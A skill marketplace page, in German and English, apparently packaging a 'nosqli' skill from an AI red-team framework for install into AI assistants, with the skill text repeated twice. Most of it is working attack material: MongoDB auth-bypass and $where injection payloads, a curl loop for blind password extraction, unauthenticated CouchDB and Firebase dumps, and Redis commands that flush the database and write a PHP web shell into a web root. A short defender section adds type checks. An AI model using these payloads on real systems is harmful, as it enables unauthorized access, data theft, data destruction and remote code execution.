Jeden Skill in Manus ausführen
mit einem Klick

Jeden Skill in Manus mit einem Klick ausführen

nosqli

Sterne4.445

Forks878

Aktualisiert26. Mai 2026 um 03:12

NoSQL injection — MongoDB operator injection ($ne, $gt, $where, $regex), CouchDB / Firebase / Redis attack patterns, auth bypass, blind extraction.

Installation

Mit Codex oder Claude installieren Kopieren Sie diesen Prompt, fügen Sie ihn in Codex, Claude oder einen anderen Assistant ein und lassen Sie die Skill-Seite prüfen und installieren.

In Manus ausführen

Quelle

PurpleAILAB

PurpleAILAB/Decepticon

GitHub-Repository öffnen Creator-Repositorys ansehen

Download

In Manus ausführen

Verwandte BerufeSOC

Basierend auf der SOC-Berufsklassifikation

InformationssicherheitsanalystenInformatik- und Mathematikberufe·SOC 15-1212

SKILL.md

readonly

name	nosqli
description	NoSQL injection — MongoDB operator injection ($ne, $gt, $where, $regex), CouchDB / Firebase / Redis attack patterns, auth bypass, blind extraction.
metadata	{"when_to_use":"nosql mongodb mongo couch redis firebase $ne $gt $where injection","mitre_attack":"T1190, T1212","subdomain":"injection","upstream_ref":"skills/_corpus/payloads/NoSQL Injection/"}

NoSQL Injection

NoSQL stores parse JSON / native objects. When user input becomes part of a query object (not just a value), control flows into the query.

1. MongoDB — most common target

Auth bypass

// Vulnerable: db.users.findOne({user: req.body.user, pass: req.body.pass})
POST /login
{"user": {"$ne": null}, "pass": {"$ne": null}}      // returns first user
{"user": "admin", "pass": {"$gt": ""}}              // admin if pw exists
{"user": "admin", "pass": {"$regex": "^A"}}         // blind char extraction

Server-side JS injection

{"$where": "this.user == 'admin' && sleep(5000)"}   // time-based
{"$where": "function() { return this.user.length > 0 && this.user.match(/^a/) }"}

$where was deprecated in Mongo 4.4 — still appears in legacy.

Operator extraction (blind)

# Burp Intruder w/ payload list
for char in {a..z}; do
  curl -s -X POST $TARGET/login \
    -d "{\"user\":\"admin\",\"pass\":{\"\$regex\":\"^${char}\"}}" \
    | grep -q "success" && echo "char: $char"
done

2. CouchDB

# Admin party (no auth required)
curl http://target:5984/_all_dbs
curl http://target:5984/_users/_all_docs
# Then read/modify any document

3. Firebase Realtime Database

# Public-read databases (most common misconfig)
curl https://YOUR-FIREBASE-PROJECT.firebaseio.com/.json
# Returns entire DB if rules are "true"

4. Redis

# Unauth Redis (still common on internal nets, occasionally exposed)
redis-cli -h target -p 6379 INFO
# Module loading attack if running as root + module dir writable
redis-cli -h target FLUSHALL
redis-cli -h target SET dir /var/www/html
redis-cli -h target SET dbfilename shell.php
redis-cli -h target SET payload "<?php system($_GET['c']); ?>"
redis-cli -h target SAVE

5. Tools

NoSQLMap — automated mongo injection (nosqlmap.py)
mongoaudit — config scanner
Burp Intruder w/ payloads/NoSQL Injection/ as wordlist
fuzzdb — has NoSQL payload variants

6. PoC

# Mongo auth bypass via curl
curl -s -X POST $TARGET/api/login \
  -H "Content-Type: application/json" \
  -d '{"username": {"$ne": null}, "password": {"$ne": null}}' \
  | jq

# If logged-in-as-admin → critical

7. Severity

Bug	Severity
Auth bypass via `$ne`	Critical 9.8
Blind char extraction of all user data	Critical 9.0
`$where` JS injection → RCE-adjacent (mongo runs the JS)	Critical 9.8
Public CouchDB / Firebase	Critical (depends on data sensitivity)
Unauth Redis on internal net	High 7-8

8. Defender

// Sanitize/typecheck before query
if (typeof req.body.user !== 'string') return res.status(400).send();
if (typeof req.body.pass !== 'string') return res.status(400).send();

// Or use parameterized queries / Mongo ODM (Mongoose schemas)
User.findOne({user: req.body.user}).select('+password');

// Disable $where globally
mongoose.set('strictQuery', true);

Cross-references

Upstream catalog: skills/_corpus/payloads/NoSQL Injection/
SQLi (different attack class, similar mindset): skills/exploit/web/sqli.md

Mehr aus diesem Repository

gleiches Repository

decepticon

PurpleAILAB/Decepticon

Drive Decepticon — an autonomous multi-agent red-team framework — over MCP to run authorized penetration tests and bug-bounty engagements end to end, then watch and steer them live from chat. Launch an engagement against a target, poll its transcript to narrate progress, send messages to refocus it, and pull findings as SARIF. Use when the user asks to run a pentest/red-team engagement, hunt a bug bounty, do recon, exploit/scan a host, web app, API, network, cloud, Active Directory, mobile app, or smart contract WITH Decepticon — or to check/resume a running engagement or report what Decepticon found. Triggers: run a decepticon engagement, pentest this with decepticon, bug bounty, recon this target, red team this, scan this host, resume the engagement, what did decepticon find, decepticon status. Do NOT use for ad-hoc local tool runs (running nmap/sqlmap/ffuf directly) when no Decepticon server is involved — this drives the Decepticon orchestrator, not raw tools.

2026-06-164.4k

iot-security

PurpleAILAB/Decepticon

IoT device security reconnaissance — firmware extraction, embedded analysis, protocol identification, default credential checking, vulnerability scanning, device fingerprinting.

2026-06-154.4k

mobile-security

PurpleAILAB/Decepticon

Mobile application security reconnaissance — APK/IPA analysis, permission enumeration, certificate validation, hardcoded secret detection, insecure storage identification, network security analysis.

2026-06-154.4k

wireless-security

PurpleAILAB/Decepticon

Wireless network security reconnaissance — WiFi analysis, Bluetooth assessment, RFID/NFC evaluation, signal capture, protocol analysis, encryption testing, rogue device detection.

2026-06-154.4k

finding-protocol

PurpleAILAB/Decepticon

Operational-tier finding template — minimal fields for sub-agent decision support. Heavyweight deliverable promotion lives in skills/decepticon/final-report.

2026-06-124.4k

engagement-lifecycle

PurpleAILAB/Decepticon

Red team engagement lifecycle management — initiation, phase transitions, go/no-go gates, deconfliction, emergency procedures, completion.

2026-06-124.4k

name	nosqli
description	NoSQL injection — MongoDB operator injection ($ne, $gt, $where, $regex), CouchDB / Firebase / Redis attack patterns, auth bypass, blind extraction.
metadata	{"when_to_use":"nosql mongodb mongo couch redis firebase $ne $gt $where injection","mitre_attack":"T1190, T1212","subdomain":"injection","upstream_ref":"skills/_corpus/payloads/NoSQL Injection/"}

NoSQL Injection

NoSQL stores parse JSON / native objects. When user input becomes part of a query object (not just a value), control flows into the query.

1. MongoDB — most common target

Auth bypass

// Vulnerable: db.users.findOne({user: req.body.user, pass: req.body.pass})
POST /login
{"user": {"$ne": null}, "pass": {"$ne": null}}      // returns first user
{"user": "admin", "pass": {"$gt": ""}}              // admin if pw exists
{"user": "admin", "pass": {"$regex": "^A"}}         // blind char extraction

Server-side JS injection

{"$where": "this.user == 'admin' && sleep(5000)"}   // time-based
{"$where": "function() { return this.user.length > 0 && this.user.match(/^a/) }"}

$where was deprecated in Mongo 4.4 — still appears in legacy.

Operator extraction (blind)

# Burp Intruder w/ payload list
for char in {a..z}; do
  curl -s -X POST $TARGET/login \
    -d "{\"user\":\"admin\",\"pass\":{\"\$regex\":\"^${char}\"}}" \
    | grep -q "success" && echo "char: $char"
done

2. CouchDB

# Admin party (no auth required)
curl http://target:5984/_all_dbs
curl http://target:5984/_users/_all_docs
# Then read/modify any document

3. Firebase Realtime Database

# Public-read databases (most common misconfig)
curl https://YOUR-FIREBASE-PROJECT.firebaseio.com/.json
# Returns entire DB if rules are "true"

4. Redis

# Unauth Redis (still common on internal nets, occasionally exposed)
redis-cli -h target -p 6379 INFO
# Module loading attack if running as root + module dir writable
redis-cli -h target FLUSHALL
redis-cli -h target SET dir /var/www/html
redis-cli -h target SET dbfilename shell.php
redis-cli -h target SET payload "<?php system($_GET['c']); ?>"
redis-cli -h target SAVE

5. Tools

NoSQLMap — automated mongo injection (nosqlmap.py)
mongoaudit — config scanner
Burp Intruder w/ payloads/NoSQL Injection/ as wordlist
fuzzdb — has NoSQL payload variants

6. PoC

# Mongo auth bypass via curl
curl -s -X POST $TARGET/api/login \
  -H "Content-Type: application/json" \
  -d '{"username": {"$ne": null}, "password": {"$ne": null}}' \
  | jq

# If logged-in-as-admin → critical

7. Severity

Bug	Severity
Auth bypass via `$ne`	Critical 9.8
Blind char extraction of all user data	Critical 9.0
`$where` JS injection → RCE-adjacent (mongo runs the JS)	Critical 9.8
Public CouchDB / Firebase	Critical (depends on data sensitivity)
Unauth Redis on internal net	High 7-8

8. Defender

// Sanitize/typecheck before query
if (typeof req.body.user !== 'string') return res.status(400).send();
if (typeof req.body.pass !== 'string') return res.status(400).send();

// Or use parameterized queries / Mongo ODM (Mongoose schemas)
User.findOne({user: req.body.user}).select('+password');

// Disable $where globally
mongoose.set('strictQuery', true);

Cross-references

Upstream catalog: skills/_corpus/payloads/NoSQL Injection/
SQLi (different attack class, similar mindset): skills/exploit/web/sqli.md